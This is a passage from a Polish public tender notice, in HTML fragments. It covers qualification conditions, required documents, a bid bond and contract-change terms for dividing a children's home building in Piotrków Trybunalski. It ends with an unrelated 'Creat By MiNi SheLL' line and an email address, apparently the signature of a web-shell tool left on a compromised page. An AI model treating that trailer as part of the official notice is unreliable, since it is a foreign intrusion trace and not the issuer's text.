class="normal">Okres rękojmi (w pełnych latach)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) zdolność do występowania w obrocie gospodarczym<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) sytuacja ekonomiczna lub finansowa:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) zdolność techniczna lub zawodowa:<br/>1. dotycząca doświadczenia wykonawcy:<br/>Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich 5 latach przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie co najmniej dwie roboty budowlane,<br/>polegające<br/>na budowie lub przebudowie lub remoncie co najmniej jednego budynku o wartości minimum 800 000,00 zł brutto – każda.<br/>W przypadku wykonawców składających wspólnie ofertę warunek zostanie spełniony, jeżeli spełni go co najmniej jeden z<br/>wykonawców.<br/>Zamawiający zastrzega, że w sytuacji gdy wykonawca polega na doświadczeniu grupy wykonawców, której był członkiem,<br/>doświadczenie to oceniane będzie na podstawie konkretnego zakresu udziału tego wykonawcy, a więc jego faktycznego<br/>wkładu<br/>w prowadzenie działań, które były wymagane od tej grupy w ramach danego zamówienia publicznego.<br/>2. dotycząca osób skierowanych przez wykonawcę do realizacji zamówienia:<br/>Wykonawca spełni warunek, jeżeli dysponuje i skieruje do realizacji następujące osoby:<br/>Kierownika budowy – posiadającego uprawnienia do pełnienia samodzielnej funkcji technicznej w budownictwie do<br/>kierowania robotami budowlanymi w specjalności konstrukcyjno – budowlanej.<br/>W przypadku dysponowania osobami będącymi obywatelami państw członkowskich Unii Europejskiej, Konfederacji<br/>Szwajcarskiej oraz państwa członkowskiego Europejskiego Porozumieniu o wolnym Handlu (EFTA) – strony umowy o<br/>Europejskim Obszarze Gospodarczym, kwestie uprawnień należy rozpatrywać z uwzględnieniem art. 12a ustawy z dnia 7<br/>lipca 1994 r. Prawo budowlane oraz ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz<br/>inżynierów budownictwa oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w<br/>państwach członkowskich UE.<br/>3. Wykonawca może w celu potwierdzenia spełniania warunków udziału w polegać na zdolnościach technicznych lub<br/>zawodowych podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków<br/>prawnych:<br/>1) w odniesieniu do warunków dotyczących doświadczenia, wykonawcy mogą polegać na zdolnościach podmiotów<br/>udostępniających zasoby, jeśli podmioty te wykonają świadczenie do realizacji którego te zdolności są wymagane, 2)<br/>wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą,<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów,<br/>3) wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia<br/>oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, podmiotu udostępniającego zasoby, potwierdzające brak<br/>podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim<br/>wykonawca powołuje się na jego zasoby, zgodnie z warunkami określonymi w pkt 2,<br/>4) jeżeli zdolności techniczne lub zawodowe podmiotu udostępniającego zasoby nie potwierdzają spełniania przez<br/>wykonawcę warunków udziału w postępowaniu lub zachodząwobec tego podmiotu podstawy wykluczenia, zamawiający<br/>żąda, aby wykonawca w terminie określonym przez zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami<br/>albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu,<br/>5) wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów<br/>udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby.<br/>4. Oceniając zdolność techniczną lub zawodową, zamawiający może, na każdym etapie postępowania, uznać, że<br/>wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w<br/>szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze<br/>wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenie o<br/>aktualności informacji w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp – załącznik nr 5 do SWZ IDW,<br/>2) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę,<br/>ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy<br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik<br/>nr 6 do SWZ IDW.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca dołącza do oferty (jeśli dotyczy):<br/>1) Oświadczenie o podziale zadań pomiędzy współwykonawców, o którym mowa w art. 117 ust. 4 ustawy Pzp – w przypadku<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia – załącznik nr 4 do SWZ IDW.<br/>2) Zobowiązanie podmiotu udostępniającego zasoby do oddania do dyspozycji wykonawcy niezbędnych zasobów na potrzeby<br/>realizacji zamówienia, o którym mowa w art. 118 ust. 3 ustawy Pzp – w przypadku wykonawcy polegającego na zdolnościach<br/>technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby – załącznik nr 3 do<br/>SWZ IDW.<br/>Wykonawca, którego oferta została najwyżej oceniona, zostanie wezwany do złożenia w wyznaczonym terminie, nie krótszym niż 5<br/>dni, od dnia wezwania, podmiotowych środków dowodowych aktualnych na dzień składania:<br/>1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, polegających na budowie lub przebudowie lub remoncie co najmniej jednego budynku o wartości minimum<br/>800 000,00 zł brutto – każda, wraz z podaniem ich rodzaju, wartości2, daty, miejsca wykonania i podmiotów, na rzecz których roboty<br/>te zostały wykonane – załącznik nr 7 do IDW.<br/>W przypadku, gdy wykonawca wykonał w ramach jednego kontraktu/ umowy większy zakres prac, dla potrzeb niniejszego<br/>postępowania winien wyodrębnić zakres/rodzaj robót, o którym mowa powyżej i podać jego wartość.<br/>Jeżeli wykonawca wykazuje doświadczenie nabyte w ramach kontraktu (zamówienia/ umowy) realizowanego przez wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia (konsorcjum), zamawiający nie dopuszcza by wykonawca polegał na<br/>doświadczeniu grupy wykonawców, której był członkiem, jeżeli faktycznie i konkretnie nie wykonywał wykazywanego zakresu prac.<br/>Zamawiający zastrzega możliwość zwrócenia się do wykonawcy o wyjaśnienia w zakresie faktycznie i konkretnie wykonywanego<br/>zakresu prac przez wykonawcę oraz przedstawienia stosownych dowodów np. umowy konsorcjum, z której wynika zakres<br/>obowiązków czy wystawionych przez wykonawcę faktur.<br/>2) dowody określające czy roboty budowlane wskazane w wykazie zostały wykonane należycie, w szczególności informacje o tym<br/>czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone3,<br/>3) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego,<br/>w szczególności odpowiedzialnych za kierowanie robotami budowlanymi:<br/>Kierownik budowy posiadający uprawnienia do pełnienia samodzielnej funkcji technicznej w budownictwie do kierowania robotami<br/>budowlanymi w specjalności konstrukcyjno – budowlanej wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami – załącznik nr 8 do IDW<br/>Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które zamawiający posiada, jeżeli wykonawca<br/>wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty wykonawca składa również za pośrednictwem Platformy (jeśli dotyczy):<br/>1) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub<br/>innego właściwego rejestru, Wykonawca nie jest zobowiązany do złożenia ww. dokumentów, jeżeli zamawiający może je<br/>uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych a wykonawca w formularzu Oferta wskazał dane<br/>umożliwiające dostęp do tych<br/>dokumentów w odniesieniu do wykonawcy jak również w odniesieniu do podmiotów udostępniających zasoby.<br/>2) pełnomocnictwo do reprezentowania wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia lub<br/>inny dokument potwierdzający umocowanie do reprezentowania wykonawcy (np. umowa o współdziałaniu). Pełnomocnik<br/>może być<br/>ustanowiony do reprezentowania wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia<br/>umowy Wykonawcy działający wspólnie:<br/> jeżeli ofertę składa kilku wykonawców działających wspólnie, obowiązani są ustanowić wspólnego pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego – do pełnomocnictwa stosuje się w szczególności przepisy Kodeksu<br/>cywilnego,<br/> pełnomocnikiem może być jeden z wykonawców działających wspólnie lub osoba trzecia (np. pracownik jednego z<br/>wykonawców),<br/> jeżeli pełnomocnikiem pozostałych wykonawców jest wykonawca będący osobą prawną to może on działać zgodnie z<br/>ujawnionymi w dokumentach rejestrowych zasadami reprezentacji.<br/>3) pełnomocnictwo do złożenia Oferty, podpisania podmiotowych środków dowodowych lub innych oświadczeń i<br/>dokumentów składanych wraz z Ofertą, chyba że prawo do ich podpisania wynika z dokumentów, o których mowa w pkt 1,<br/>4) oryginał gwarancji lub poręczenia, jeśli wadium wnoszone jest w innej formie niż pieniądz, z uwzględnieniem postanowień<br/>Rozdziału XIX IDW,<br/>5) oświadczenie, o którym mowa w art. 125 ustawy Pzp, – oświadczenie nie jest podmiotowym środkiem dowodowym i<br/>stanowi tymczasowy dowód potwierdzający brak podstaw wykluczenia i spełnianie warunków udziału w postępowaniu na<br/>dzień składania ofert,<br/>6) zobowiązanie podmiotu udostępniającego zasoby na potrzeby wykonawcy składającego ofertę, w przypadku gdy<br/>wykonawca polega na zdolnościach podmiotów udostępniających zasoby w celu potwierdzenia spełniania warunków udziału<br/>w postępowaniu wraz z pełnomocnictwami, jeżeli prawo do podpisania danego zobowiązania nie wynika z dokumentów, o których mowa w pkt 1),<br/>7) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>dotyczące dostaw, usług lub robót budowlanych, które wykonają poszczególni wykonawcy, o którym mowa w art. 117 ust. 4<br/>ustawy Pzp,<br/>8) przedmiotowe środki dowodowe: nie dotyczy,<br/>9) oświadczenia i/lub dokumenty, stanowiące wyjaśnienia, na podstawie których zamawiający dokona oceny skuteczności<br/>zastrzeżenia informacji zawartych w ofercie, stanowiących tajemnicę przedsiębiorstwa (jeżeli wykonawca zastrzega takie<br/>informacje). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do wniesienia wadium w wysokości: 20.000,00 złotych.<br/>2. Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku następujących formach<br/>wymienionych w art. 97 ust. 7 ustawy Pzp, w zależności od wyboru wykonawcy.<br/>1) w przypadku wnoszenia wadium w pieniądzu:<br/> wykonawca dokonuje przelewu na rachunek bankowy zamawiającego (niedopuszczalna jest bezpośrednia wpłata kwoty<br/>wadium np. w kasie zamawiającego<br/>lub banku):<br/>GETIN NOBLE BANK S.A. KONTO DEPOZYTÓW:<br/>58 1560 0013 2323 1404 1000 0003<br/>w tytule przelewu należy zamieścić adnotację:<br/>Wadium – przetarg nieograniczony pn.:<br/>Podział istniejącego budynku Domu Dziecka przy ulicy Wysokiej 24/26 w Piotrkowie Trybunalskim – znak SPZ.271.17.2022.<br/> prawidłowe wniesienie wadium następuje w terminie uznania rachunku zamawiającego przed upływem wymaganego<br/>terminu, w wymaganej wysokości,<br/> ze względu na ryzyko związane z czasem trwania okresu rozliczeń międzybankowych zamawiający zaleca dokonanie<br/>przelewu ze stosownym wyprzedzeniem,<br/> w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, wadium może być wnoszone w częściach<br/>przez poszczególnych wykonawców wspólnie ubiegających się o udzielenie zamówienia, przez jednego z nich lub przez<br/>pełnomocnika.<br/>2) w przypadku wnoszenia wadium w formie gwarancji lub poręczenia:<br/> wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej,<br/> beneficjenta wadium należy wskazać:<br/>Miasto Piotrków Trybunalski<br/>Pasaż Karola Rudowskiego 10<br/>97-300 Piotrków Trybunalski<br/> wadium musi obejmować cały okres związania ofertą,<br/> treść gwarancji lub poręczenia nie może zawierać postanowień uzależniających jego dalsze obowiązywanie od zwrotu<br/>oryginału dokumentu gwarancyjnego do gwaranta,  musi obejmować odpowiedzialność gwaranta za wszystkie przypadki<br/>powodujące utratę wadium przez wykonawcę, określone w art. 98 ust. 6 ustawy Pzp,<br/> musi umożliwiać skuteczne zaspokojenie roszczeń zamawiającego w razie spełnienia przesłanek zatrzymania wadium –<br/>np. nie może zawierać zapisu, że wszelkie roszczenia należy zgłosić w okresie ważności gwarancji, w przypadku gdy termin<br/>jej ważności jest tożsamy z terminem związania ofertą,<br/> musi zawierać w swojej treści nieodwołalne i bezwarunkowe zobowiązanie wystawcy dokumentu do zapłaty na rzecz<br/>zamawiającego kwoty wadium płatne na pierwsze pisemne żądanie zamawiającego – zawierające oświadczenie, że<br/>zaistniały okoliczności, o których mowa w art. 98 ust. 6, bez konieczności potwierdzana tych okoliczności przez wykonawcę<br/>i składania jakichkolwiek dodatkowych oświadczeń, dokumentów lub dokonania czynności przez wykonawcę lub osoby<br/>trzecie, bez pośrednictwa banku korespondenta lub innej tego typu instytucji,<br/> w treści gwarancji powinna znaleźć się klauzula stanowiąca, iż wszystkie spory odnośnie gwarancji będą rozstrzygane<br/>zgodnie z prawem polskim i poddane jurysdykcji sądów polskich, chyba, że wynika to z przepisów prawa,<br/> w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia wadium może być wniesione przez jeden z<br/>podmiotów wspólnie ubiegających się o udzielenie zamówienia, z tym że w treści gwarancji lub poręczenia zaleca się, aby<br/>zostali wymienieni (objęci zakresem gwarancji/poręczenia) wszyscy wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia.<br/>W przypadku gwarancji/poręczenia, w której treści nie zostaną wymienieni jako<br/>zobowiązani wszyscy wykonawcy wspólnie ubiegający się o udzielenie zamówienia,<br/>zabezpieczenie oferty wspólnej będzie skuteczne jeżeli gwarancja wadialna zostanie<br/>wystawiona po zawiązaniu konsorcjum na pełnomocnika wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>3. Zamawiający odrzuci ofertę na podstawie art. 226 ust 1 pkt 14, jeśli wykonawca nie wniósł wadium, lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą<br/>lub złożył wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>3. Żaden z wykonawców wspólnie ubiegający się o udzielenie zamówienia nie może podlegać wykluczeniu.<br/>4. Każdy z wykonawców wspólnie ubiegających się o zamówienie składa oświadczenie, o którym mowa w art. 125 ustawy<br/>Pzp, potwierdzające brak podstaw wykluczenia oraz spełniania warunków udziału w postępowaniu w zakresie, w jakim<br/>każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>5. Zamawiający, mając na uwadze, charakter zamówienia i proporcjonalność, określa szczególny, obiektywnie uzasadniony,<br/>sposób spełniania przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, tzn.:<br/>1) Warunek określony w Rozdziale VIII SWZ IDW dotyczący zdolności technicznej lub zawodowej (doświadczenia<br/>wykonawcy), musi spełniać co najmniej jeden z wykonawców działających wspólnie,<br/>2) Warunek określony w Rozdziale VIII SWZ IDW dotyczący zdolności technicznej lub zawodowej (osoby skierowane przez<br/>wykonawcę do realizacji zamówienia) mogą spełniać wykonawcy łącznie.<br/>5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach - w odniesieniu do<br/>warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, tych z wykonawców, którzy wykonają<br/>roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>6. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty, w celu wykazania spełniania warunków<br/>udziału, oświadczenie o podziale zadań pomiędzy współwykonawców, o którym mowa w art. 117 ust. 4 ustawy Pzp. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana terminu zakończenia realizacji, jeżeli wystąpią następujące okoliczności:<br/>1) wystąpi zmiana przepisów prawnych istotnych dla realizacji przedmiotu umowy i mająca wpływ na zakres lub termin<br/>wykonania zamówienia,<br/>2) organ administracji publicznej lub inna upoważniona instytucja nie wydała decyzji lub warunków technicznych lub innego<br/>dokumentu niezbędnego do prawidłowej realizacji zamówienia w terminie ustawowo przewidzianym dla danej czynności,<br/>jeśli nastąpiło to z przyczyn niezależnych od wykonawcy, a przedłużenie ma wpływ na termin realizacji umowy,<br/>3) przedłużenie się czasu uzyskania uzgodnień, opinii lub zgód gestorów sieci lub innych podmiotów lub osób,<br/>4) jeżeli wystąpiły przyczyny będące następstwem okoliczności, za które odpowiedzialność ponosi wyłącznie Zamawiający,<br/>w szczególności: nieterminowego przekazania terenu budowy, konieczności zmian dokumentacji projektowej, w zakresie, w<br/>jakim miały one lub będą mogły mieć wpływ na dotrzymanie terminu zakończenia umowy,<br/>5) wystąpią niesprzyjające warunki atmosferyczne uniemożliwiające prawidłowe wykonanie robót z powodu technologii<br/>realizacji robót, jeżeli konieczność wykonania robót w tym okresie nie jest następstwem okoliczności, za które wykonawca<br/>ponosi odpowiedzialność,<br/>6) wystąpi konieczność wykonania robót zamiennych lub innych robót niezbędnych do wykonania zamówienia ze względu<br/>na zasady wiedzy techn., które wstrzymują lub opóźniają realizację zamówienia,<br/>7) wystąpi brak możliwości wykonywania robót z przyczyn niezależnych od wykonawcy, w szczególności z powodu<br/>niedopuszczenia do ich wykonywania lub nakazania ich wstrzymania przez uprawniony organ, lub też konieczności<br/>wstrzymania robót wynikającej bezpośrednio z przepisów prawa,<br/>8) wystąpią warunki terenu budowy warunków lub stan pomieszczeń odbiegające w sposób istotny od przyjętych w<br/>dokumentacji proj. i STWiORB, w szczególności w razie napotkania niezinwentaryzowanych lub błędnie<br/>zinwentaryzowanych sieci, instalacji lub innych obiektów,<br/>9) wystąpi siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z jej postanowieniami,<br/>10) w przypadku innych istotnych okoliczności niezawinionych przez wykonawcę i niewymienionych powyżej, a<br/>wpływających na termin realizacji, w szczególności: trudności w pozyskiwaniu materiałów budowlanych, urządzeń i innych<br/>czynników niezbędnych dla prawidłowej realizacji umowy, których nie można było przewidzieć przed jej podpisaniem.<br/>2. Zmiany w zakresie innych niż termin zakończenia realizacji w następujących sytuacjach:<br/>1) konieczności zrealizowania jakiejkolwiek części robót, objętej przedmiotem umowy, przy zastosowaniu odmiennych<br/>rozwiązań technicznych, materiałowych lub technologicznych, niż wskazane w dokumentacji proj. lub STWiORB, a<br/>wynikających ze stwierdzonych wad dokumentacji proj. lub STWiORB, zmiany stanu prawnego lub technologii w oparciu, o<br/>które je przygotowano, gdyby zastosowanie pierwotnych rozwiązań groziło niewykonaniem lub nienależytym wykonaniem<br/>zamówienia,<br/>2) wystąpienia warunków terenu budowy lub stanu pomieszczeń odbiegających w sposób istotny od przyjętych w dokumentacji proj. lub STWiORB, w szczególności napotkania niezinwentaryzowanych lub błędnie zinwentaryzowanych<br/>sieci, instalacji lub innych obiektów bud.,<br/>3) wystąpienia konieczności wykonania robót zamiennych lub innych robót niezbędnych do wykonania zamówienia, a<br/>nieobjętych dokumentacją proj lub STWiORB, ze względu na konieczność usunięcia niebezpieczeństwa kolizji z<br/>planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub<br/>usunięcia tych kolizji,<br/>4) sytuacji, w której wykonanie pełnego zakresu robót nie będzie konieczne, gdy wykonanie danych robót będzie zbędne do<br/>prawidłowego wykonania przedmiotu umowy.<br/>3. W przypadkach wskazanych w ustępie 3 pkt 1) -3) wykonawca będzie miał prawo do wystąpienia o zwiększenie<br/>wysokości wynagrodzenia,<br/>4. Zmiany w zakresie koniecznym do dostosowania jej treści do wymagań Ustawy o elektromobilności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-29 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/piotrkow_tryb</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-29 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-08-27</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Ofertę stanowi:<br/>1) formularz Oferta, sporządzony wg wzoru stanowiącego załącznik nr 1 do SWZ IDW,<br/>bądź też w innej zgodnej formie, odpowiadającej treści IDW,<br/>2) część niejawna oferty (jeśli dotyczy), zawierająca informacje stanowiące tajemnicę przedsiębiorstwa6 – należy załączyć w<br/>osobnym pliku z oznaczeniem „Tajemnica przedsiębiorstwa”. Wykonawca nie może zastrzec informacji, o których mowa w<br/>art. 222 ust. 5. ustawy Pzp,

Creat By MiNi SheLL
Email: jattceo@gmail.com